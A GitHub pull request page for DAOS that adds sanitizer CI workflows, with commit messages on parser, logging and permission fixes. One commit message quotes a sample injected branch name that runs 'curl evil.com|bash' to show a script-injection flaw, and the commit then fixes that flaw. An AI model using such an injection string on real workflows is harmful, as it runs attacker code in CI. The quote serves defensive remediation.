Skip to content

DAOS-18626 cq: ASAN Men check with GitHub Action#18557

Draft
knard38 wants to merge 11 commits into
ckochhof/dev/master/daos-18826/patch-001from
ckochhof/dev/master/daos-18626/patch-001
Draft

DAOS-18626 cq: ASAN Men check with GitHub Action#18557
knard38 wants to merge 11 commits into
ckochhof/dev/master/daos-18826/patch-001from
ckochhof/dev/master/daos-18626/patch-001

Conversation

@knard38

@knard38 knard38 commented Jun 26, 2026

Copy link
Copy Markdown
Contributor

TODO

Steps for the author:

  • Commit message follows the guidelines.
  • Appropriate Features or Test-tag pragmas were used.
  • Appropriate Functional Test Stages were run.
  • At least two positive code reviews including at least one code owner from each category referenced in the PR.
  • Testing is complete. If necessary, forced-landing label added and a reason added in a comment.

After all prior steps are complete:

  • Gatekeeper requested (daos-gatekeeper added as a reviewer).

@knard38 knard38 self-assigned this Jun 26, 2026
@github-actions

Copy link
Copy Markdown

Ticket title is 'ASAN Men check with GitHub Action'
Status is 'In Progress'
https://daosio.atlassian.net/browse/DAOS-18626

Comment thread .github/workflows/sanitizer-template.yml Fixed
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 49ca01a to 513c51b Compare June 26, 2026 14:13
@knard38 knard38 changed the base branch from master to ckochhof/dev/master/daos-18826/patch-001 June 26, 2026 14:14
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 513c51b to 9ca93b1 Compare June 26, 2026 18:44
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/memcheck.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
@daosbuild3

Copy link
Copy Markdown
Collaborator

@github-advanced-security

Copy link
Copy Markdown

You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool.

What Enabling Code Scanning Means:

  • The 'Security' tab will display more code scanning analysis results (e.g., for the default branch).
  • Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results.
  • You will be able to see the analysis results for the pull request's branch on this overview once the scans have completed and the checks have passed.

For more information about GitHub Code Scanning, check out the documentation.

Comment thread .github/workflows/memcheck.yml Fixed
@daosbuild3

Copy link
Copy Markdown
Collaborator

Test stage Functional Hardware Large MD on SSD completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/12/execution/node/1330/log

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 9bb48e6 to 1929d2b Compare June 29, 2026 07:30
knard38 pushed a commit that referenced this pull request Jun 29, 2026
Fixes three issues flagged by GitHub Scorecard on PR #18557:

1. [CRITICAL score=0] Dangerous-Workflow: script injection in memcheck.yml
   The 'Resolve SARIF ref and SHA' step interpolated GitHub context values
   (${{ github.event.pull_request.head.ref }}, etc.) directly into a
   bash run: block. A PR branch name containing shell metacharacters
   (e.g. 'main"; curl evil.com|bash; echo') would execute arbitrary code.
   Fix: pass all context values through an env: block and reference them
   as ${ENV_VAR} in the shell, following GitHub's recommended remediation.

2+3. [WARNING score=7] Token-Permissions: top-level permissions in tsan.yml
   security-events: write and checks: write were set at the workflow
   top level. Best practice is to set permissions at the job level so
   that only the specific job that needs them receives elevated access.
   Fix: remove the top-level permissions block from tsan.yml and add
   a permissions: section directly under the build-daos_tsan job.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
knard38 pushed a commit that referenced this pull request Jun 29, 2026
Fixes three open Scorecard findings from PR #18557:

1. Pinned-Dependencies (score=3): codeql-action/upload-sarif@v4 is a
   floating tag. Scorecard requires actions to be pinned by full commit
   SHA to prevent supply-chain attacks.
   Fix: replace @v4 with @8aad20d150bbac5944a9f9d289da16a4b0d87c1e
   (v4.36.2) in both memcheck.yml (2 occurrences) and tsan.yml (1).
   This SHA is already used by other workflows in the repository.

2. Token-Permissions (score=8): no top-level permission defined in
   tsan.yml after we moved permissions to job-level. Scorecard requires
   an explicit top-level permissions block so any future job added to
   the workflow gets the minimum access (read-only) by default.
   Fix: add 'permissions: {}' at workflow top-level in tsan.yml.

Note: Token-Permissions score=8 for 'jobLevel checks: write' in
tsan.yml (finding 3490170495) is expected and accepted — this
permission is required by the action-junit-report action to post test
result checks, and the same pattern is used without issue in memcheck.yml.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/asan.yml Fixed
Comment thread .github/workflows/asan.yml Fixed
Comment thread .github/workflows/sanitizer-template.yml Fixed
Comment thread .github/workflows/sanitizer-template.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 7f0ea9f to 6e5ef4b Compare June 29, 2026 13:22
…caffold

TODO

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 6e5ef4b to 98995d5 Compare June 29, 2026 13:45
kanard38 added 10 commits June 29, 2026 13:59
1. parse_tsan_reports.py: move deferred 'import build_sarif_doc' from
   inside build_sarif() to the top-level import block. Remove the
   '# noqa: PLC0415' workaround.

2. parse_tsan_reports.py: add missing column= field to StackFrame
   construction when parsing TSan stack frames. _RE_FRAME captures
   col but the value was discarded.

3. parse_tsan_reports.py: remove _sarif_location_frame() wrapper which
   unnecessarily dropped frame.column. Inline as sarif_location(...,
   primary.column) for consistency with ASan and UBSan.
   Remove the now-unused sarif_location alias import.

4. sanitizer_report_base.py: replace duck-typing (hasattr/getattr) in
   resolve_paths_flat with typed functions:
   - Rename to resolve_paths_frames (pure frame list, backward-compat
     alias kept as resolve_paths_flat)
   - Remove the hasattr(report, 'file') block from the base module
   - parse_ubsan_reports.py: local resolve_paths() calls
     resolve_paths_frames AND resolves report.file → rel_file explicitly
   - parse_asan_reports.py: updated to use resolve_paths_frames

5. sanitizer_report_base.py: fix main_runner to call build_sarif_fn([])
   instead of build_sarif_doc('', '', [], []) for the missing-dir case,
   so the empty SARIF has the correct tool name and URI.

6. parse_tsan_reports.py: remove sarif_location alias import
   (only used by _sarif_location_frame removed in fix 3).

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
…string

Three words flagged as incorrect spelling in the module docstring:
  - 'dataclass' → 'data class'
  - 'compat'    → reworded: 'backward-compatible alias for ...'
  - 'parser's'  → reworded: 'each parser main()'

Rewrite the affected lines to avoid the flagged forms without adding
words to words.dict (minimal change).

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Scorecard flagged 'no topLevel permission defined' (score=9) for the
reusable workflow sanitizer-template.yml. Unlike the caller workflows
(asan.yml, tsan.yml) which already had the DAOS-convention top-level
'permissions: {}' block, the template was created without it.

Add the same 'permissions: {}' pragma with the explanatory comment
used by the other DAOS CI workflows. This resolves the 'no topLevel
permission defined' finding while accepting the remaining job-level
write-permission findings (checks:write, security-events:write), which
match the established DAOS security posture and will become baseline
after merge.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
…t log override

The _override_sanitizer_log_path() method in run_utest.py redirected
log_path for ASAN_OPTIONS, UBSAN_OPTIONS, and TSAN_OPTIONS per test,
putting all sanitizer logs inside test-results/logs/<test>/. For
ASan/UBSan this is fine because the runner script and workflow parse
step know to look there.

For TSan it breaks the pipeline:
  - run-unit_tests-sanitizer.sh detects TSan via: ls tsan-logs/tsan.*
  - parse_tsan_reports.py is invoked with: --report-dir tsan-logs
  - With the override, tsan.* files go to test-results/logs/<test>/
    instead, leaving tsan-logs/ empty
  - tsan_detected=0 → no TSan SARIF uploaded → 0 findings reported

Fix: exclude TSAN_OPTIONS from the per-test log_path override. TSan
logs continue to go to the global tsan-logs/ directory where the
existing detection and parsing pipeline expects them. TSan findings
can still be correlated to specific tests by cross-referencing the
PID in daos.log (which already uses the same PID namespace).

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
The previous approach of overriding ASAN_OPTIONS/UBSAN_OPTIONS/TSAN_OPTIONS
log_path per test redirected all sanitizer logs away from the global
directories (asan-logs/, ubsan-logs/, tsan-logs/). This broke:
  - Detection: ls asan-logs/asan.* found nothing → asan_detected=0
  - Parsing:   --report-dir asan-logs was empty → 0 findings reported

Fix: revert _override_sanitizer_log_path to a no-op so sanitizer logs
always go to the global directories where detection and parsing expects them.

Per-test correlation is preserved via a new copy mechanism:
  1. Test.setup(): snapshot existing files in all global sanitizer log dirs
  2. Test.teardown(): copy any new sanitizer log files (created during this
     test's run) into the per-test log_dir

Result:
  asan-logs/asan.<PID>                  ← detection + parsing ✓
  ubsan-logs/ubsan.<PID>                ← detection + parsing ✓
  tsan-logs/tsan.<PID>                  ← detection + parsing ✓
  test-results/logs/<test>/asan.<PID>   ← per-test correlation ✓
  test-results/logs/<test>/ubsan.<PID>  ← per-test correlation ✓
  test-results/logs/<test>/tsan.<PID>   ← per-test correlation ✓
Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
The method was already a no-op (empty body with only a docstring) after
the sanitizer log detection fix. Remove the method definition and its
call site in run().

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Two bugs in run_utest.py when running inside the sanitizer Docker container:

1. write_xml_result() wrote to test_results/test_<name>.xml relative
   to the container CWD (/home/daos/daos/), but the Docker volume mount
   maps /home/daos/test-results/ to the host.  Files written to the
   unmounted path vanish when the container exits, leaving the workflow's
   report_paths: 'test-results/**/*.xml' with nothing to find.

   Fix: derive the output directory from CMOCKA_XML_FILE (which already
   points at the mounted volume), so both the summary JUnit and the
   renamed cmocka XML files land in the correct location.

2. cmocka_dir() returned the same wrong path, so process_cmocka() never
   found the per-suite cmocka XML files written by test binaries via
   CMOCKA_XML_FILE, leaving them unprocessed in the mounted directory.

3. Test names built from commands with quoted arguments (e.g.
   vos_perf -R "U Q;p V") contained double-quote characters.
   The GitHub Actions artifact uploader rejects paths with ", causing
   'path for one of the files in artifact is not valid' errors.

   Fix: strip '"' from self.name alongside the existing space/semicolon
   replacements.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
LeakSanitizer reports where all stack frames are in system libraries
(libc, libasan) have no project source location.  Two problems with
these reports:

1. emit_annotations() emitted ::error:: for them, causing the 'Parse
   ASan reports' step to exit 1 even when no in-project code is at
   fault.  This is misleading and was blocking the SARIF upload step.

   Fix: emit ::warning:: instead so the step only fails when there is
   an actionable, in-project finding.

2. build_sarif() constructed a result with an empty location dict {}
   (when the StackFrame had no file or rel_file), which GitHub Code
   Scanning rejects with 'locationFromSarifResult: expected a physical
   location'.

   Fix: skip any report whose primary frame yields no usable location
   so only valid, locatable results appear in the SARIF.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Split rationale:
  When -fsanitize=address,undefined is compiled together, ASan and UBSan
  share one sanitizer runtime.  UBSan's log_path initialization runs after
  ASan's so UBSan's log_path wins: all reports (including ASan
  stack-buffer-overflows) end up in ubsan-logs/.  The ASan parser only
  scans asan-logs/ and misses these findings.

  Building separate images with SANITIZERS=address and SANITIZERS=undefined
  gives each sanitizer its own runtime and log_path, so reports are
  always in the expected directory.

Changes:
- asan.yml: sanitizers_build_arg: address (ASan only); remove is_tsan
- ubsan.yml: new workflow, sanitizers_build_arg: undefined (UBSan only)
- tsan.yml: remove is_tsan parameter (no longer needed)
- sanitizer-template.yml: replace is_tsan boolean with sanitizer_type
  string comparisons ('asan', 'ubsan', 'tsan'); remove is_tsan input
- run-unit_tests-sanitizer.sh: add --ubsan mode (UBSAN_OPTIONS only,
  no ASAN_OPTIONS); update --asan mode (ASAN_OPTIONS only); split
  detection logic per mode
- run_utest.py: add --ubsan flag (same asan:False opt-out as --asan);
  update is_gha_ctx and Suite.should_run() for --ubsan;
  per-test JUnit: create one TestCase per test in Suite.run_suite()
  and write a per-suite XML so publish-test-results shows accurate
  counts for all three sanitizer workflows (ASan, UBSan, TSan)

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
All three parsers (ASan, UBSan, TSan) now produce the same Markdown
structure for the GitHub job summary:

  1. Short summary table (# | Error type | location | ...)
  2. <details> toggle containing:
       - full raw report per finding (code block)
       - annotated in-project call chain table

New helpers in sanitizer_report_base.py:
  - build_summary_md(): generic template that takes tool-specific
    row_fn and details_fn callbacks; handles the header, table,
    <details> scaffold and per-item rendering
  - call_chain_table(): builds the in-project call chain table from
    a list of StackFrame objects

Parser-specific changes:
  - parse_asan_reports.py: write_summary() refactored to call
    build_summary_md via _asan_row / _asan_details helpers
  - parse_ubsan_reports.py: build_summary() deduplicates 255
    violations to unique (file, line, type) locations with a Count
    column (x4, x13, ...); details show one representative report
    per unique location
  - parse_tsan_reports.py: build_summary() uses the shared template;
    Argobots note moved above the table; per-thread call chains via
    call_chain_table for each TsanThread

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Development

Successfully merging this pull request may close these issues.

4 participants